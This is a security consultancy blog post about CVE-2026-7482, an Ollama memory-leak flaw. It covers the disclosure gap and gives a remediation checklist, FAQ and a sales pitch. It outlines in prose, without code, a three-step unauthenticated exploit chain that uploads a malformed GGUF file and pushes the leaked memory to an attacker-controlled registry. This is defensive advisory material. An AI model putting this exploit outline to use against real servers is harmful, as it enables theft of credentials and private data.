Bleeding Llama: 300,000 'Private' AI Servers at Risk

1 day ago
7 min read

Updated: 7 hours ago

By Yonatan Hoorizadeh, CISO — CISSP, CISM, CRISC, AAISM

Published: May 14, 2026

Last updated: May 14, 2026

When a small business or mid-market company says “we run our AI locally for privacy reasons,” they almost always mean Ollama. It’s the most widely used framework for hosting open-source models on your own hardware — over 100 million Docker Hub downloads, roughly 171,000 GitHub stars, and quiet adoption inside enterprise networks where teams want to keep their prompts and data out of someone else’s cloud.

A critical vulnerability disclosed this week, codenamed Bleeding Llama (CVE-2026-7482), has flipped that assumption. Researchers at Cyera found that an attacker can extract the entire memory of an exposed Ollama server — including API keys, system prompts, customer conversations, and proprietary code — with three unauthenticated API calls. They estimate roughly 300,000 servers are currently reachable on the public internet.

What actually happened

Bleeding Llama is a heap out-of-bounds read in the way Ollama loads model files. Ollama supports a format called GGUF, used to package model weights and metadata for local inference. When a user uploads a GGUF file to the /api/create endpoint, Ollama parses the tensor sizes declared inside it. If those declared sizes are larger than what the file actually contains, the server reads past the end of its memory buffer and copies whatever happens to be sitting next to it on the heap.

That neighbouring memory is exactly the kind of thing a defender does not want shared: environment variables, plaintext API keys, user prompts, system prompts from other running models, conversation history, and any data the model has recently processed. The leaked bytes get wrapped into a new model artifact, which the attacker then pushes to a registry they control — quietly carrying the stolen memory out the door.

The bug carries a CVSS score of 9.1 and is fixed in Ollama version 0.17.1. Anything earlier than that is vulnerable.

Why this matters for a business

If your engineering team or data scientists are running Ollama anywhere — even on what they consider an “internal” server — there are specific business risks to take seriously.

The first is credential theft. Ollama processes typically run with environment variables set by the developer or infrastructure team. Those variables often include API keys for cloud providers, tokens for SaaS platforms, database credentials, and keys for third-party services the model is wired into. Cyera’s researchers note that “an attacker can learn basically anything about the organization from your AI inference.” A compromised Ollama server is, in practice, a compromised set of cloud credentials.

The second is data exposure. Anything an employee has typed into the local LLM — customer contracts, source code, regulated data like PHI or PII, internal strategy documents — is in process memory and reachable through this bug. For regulated industries, that’s a data-breach event under most state privacy laws, HIPAA, and SOC 2 attestations.

The third is integration blast radius. Engineers increasingly connect Ollama to coding assistants and Model Context Protocol (MCP) bridges. When that happens, every output flowing through those tools also passes through Ollama’s memory. The exposure compounds quickly.

How the attack works

The exploit chain is three API calls and requires no credentials at all:

1. The attacker uploads a malicious GGUF file via Ollama’s blob endpoint. The file declares a tensor far larger than its actual contents.

2. The attacker calls /api/create. During quantization, Ollama reads past the buffer boundary and stitches adjacent heap memory into the new model.

3. The attacker calls /api/push to send the resulting model — now carrying stolen bytes — to a registry under their control.

The reason this works at all is that Ollama’s REST API ships without authentication. The default network binding is loopback (127.0.0.1), but Ollama’s own documentation recommends OLLAMA_HOST=0.0.0.0 for any setup where the model should be reachable from another machine, and that’s a common pattern in containerized deployments, Kubernetes clusters, and shared dev environments. Once port 11434 is reachable from beyond the host, the API is effectively an unauthenticated admin panel.

The disclosure gap that left defenders blind

This is the part most likely to bite organizations that thought they were patched.

Cyera reported the vulnerability to Ollama on February 2, 2026. A fix shipped in version 0.17.1 on February 25 — but the release notes did not flag it as a security update. Cyera filed a CVE request with MITRE on March 2 and got no response. After follow-ups in March and April, the researcher escalated to a third-party CNA called Echo on April 26, which finally assigned CVE-2026-7482 on April 28.

For more than two months, organizations running vulnerable Ollama versions had no CVE number, no signal from their vulnerability scanners, and no urgency cue in any patch-management tool. The fix was in the changelog, but it looked like any other minor update. Many teams skipped it.

This is a problem we see often in conversations with clients: vulnerability management programs are built around CVE feeds, and a patch that isn’t tagged with a CVE is effectively invisible. For AI tooling — much of which evolves outside the traditional CVE process — this gap is a recurring issue.

The shadow AI problem this exposes

Here is the harder question for most business leaders: do you actually know where Ollama is running in your environment?

A common pattern looks like this. A data team wants to experiment with an open-source LLM without sending prompts to a third party. They spin up Ollama on a workstation, a small cloud VM, or a Kubernetes pod. It works. They tell a colleague. Someone else deploys their own. Six months later, the organization has half a dozen Ollama instances spread across personal laptops, AWS accounts, and the corporate dev cluster — none of them on the official inventory, none of them in the vulnerability-management program, several of them inadvertently exposed to the internet.

This is what we mean by shadow AI. It looks like shadow IT, but the stakes are higher because each shadow instance is a tunnel into prompts, secrets, and integrations that the cybersecurity team doesn’t know exist. Bleeding Llama is the kind of disclosure where shadow AI bites hardest — the patch exists, but the patch can’t help you if nobody owns the asset.

If you don’t already have an AI inventory, this is the cue to start one. A focused fractional CISO or vCISO engagement can stand up an AI inventory and exposure assessment in days, not months — and frame it in terms an executive team can act on.

What to do this week

If your organization uses Ollama, or might, here is a tight checklist worth running now:

Find it. Scan internal and cloud environments for Ollama installations. Look for processes listening on port 11434 and for Docker images containing Ollama. Ask engineering teams directly — shadow AI rarely shows up in asset databases.

Upgrade. Move every Ollama instance to version 0.17.1 or later. Verify with “ollama --version”. Anything older than 0.17.1 is exposed.

Check the binding. Any Ollama instance configured with OLLAMA_HOST=0.0.0.0 should be assumed reachable from someone, somewhere. Restrict to loopback or to a specific private subnet behind a firewall.

Assume compromise if it was internet-facing. If any instance was reachable from the public internet before patching, treat it as compromised. Rotate every API key, token, and credential that was present in its environment variables — cloud keys, SaaS tokens, database passwords, third-party API keys. Do not skip this step on the assumption that “we didn’t see anything.” The attack leaves no obvious traces in standard logs.

Put authentication in front. Deploy an authentication proxy or API gateway in front of every Ollama instance that needs to be reachable beyond localhost. The native REST API has no auth and never will, by design.

Pull AI tooling into vulnerability management. Ollama, vector databases, MCP servers, and other AI infrastructure components belong in the same patch cadence and CVE-watch process as your operating systems and web servers. The Bleeding Llama disclosure gap is a lesson in why “we follow CVEs” is no longer sufficient on its own.

Windows users, read the small print. Researchers at Striga disclosed two additional Ollama vulnerabilities (CVE-2026-42248 and CVE-2026-42249) affecting the Windows updater. They remain unpatched as of the disclosure period elapsing. Affected versions are 0.12.10 through 0.22.0. Until fixes ship, disable auto-update and remove any Ollama shortcut from the Windows Startup folder.

Frequently asked questions

Am I exposed if my Ollama server is only reachable on my company’s internal network?

Mostly — but not entirely. CVE-2026-7482 doesn’t require internet exposure. Any network where an attacker could reach port 11434 is enough, including a shared corporate LAN, a Docker network, or a Kubernetes cluster. If an attacker phishes one workstation, they can pivot to any Ollama instance on the same flat network. Network segmentation and an authentication proxy in front of Ollama are still needed for internal deployments.

What credentials should I rotate if my Ollama instance might have been compromised?

Treat every secret that was reachable from the host as potentially exposed. That includes environment variables set in the process or container (OPENAI_API_KEY, AWS_ACCESS_KEY_ID, database passwords, third-party API tokens), and any credentials embedded in the system prompts of models you ran. Rotate them, then check your cloud provider audit logs and SaaS access logs for unfamiliar activity going back to whenever the instance was first exposed.

Does upgrading to Ollama 0.17.1 close the Windows updater bugs as well?

No. The two Windows-specific flaws (CVE-2026-42248 and CVE-2026-42249) are separate from Bleeding Llama and remain unpatched as of this writing, per CERT Polska’s coordinated disclosure. Affected versions are Ollama for Windows 0.12.10 through 0.22.0. Until a fix ships, the mitigation is to disable auto-update and remove the Ollama shortcut from %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.

Are other local LLM runtimes affected by similar issues?

Bleeding Llama itself is specific to Ollama’s GGUF loader, but the underlying pattern — local AI tooling shipped without authentication, often bound to all network interfaces, and parsing untrusted file formats — is common across the self-hosted AI ecosystem. Treat any locally hosted inference server as a high-value asset that needs the same network controls, patching cadence, and access management as a database server.

How fast should we be patching AI tooling like this?

Faster than the typical 30-day patch SLA most IT shops use. The window between Cyera’s report and the public CVE was about two months, proof-of-concept code is already public, and 300,000 servers are mapped by public scanners. Treat any unpatched Ollama instance as actively at risk and aim for hours-to-days remediation, not weeks. For organizations without a 24/7 security operations function, this is exactly the kind of pace a fractional CISO or external incident response retainer is designed to support.

Need help getting ahead of shadow AI?

Bleeding Llama is one of many disclosures this year that reward organizations with disciplined AI inventories, segmented networks, and a clear playbook for what to do when a “local” tool turns out not to be. Purple Shield Security helps small and mid-market businesses build that discipline through AI security and vCISO engagements that focus on what’s actually at risk — not theoretical frameworks. If you’re not sure where your AI tooling lives, what’s exposed, or what to rotate after a disclosure like this, we’d be glad to talk.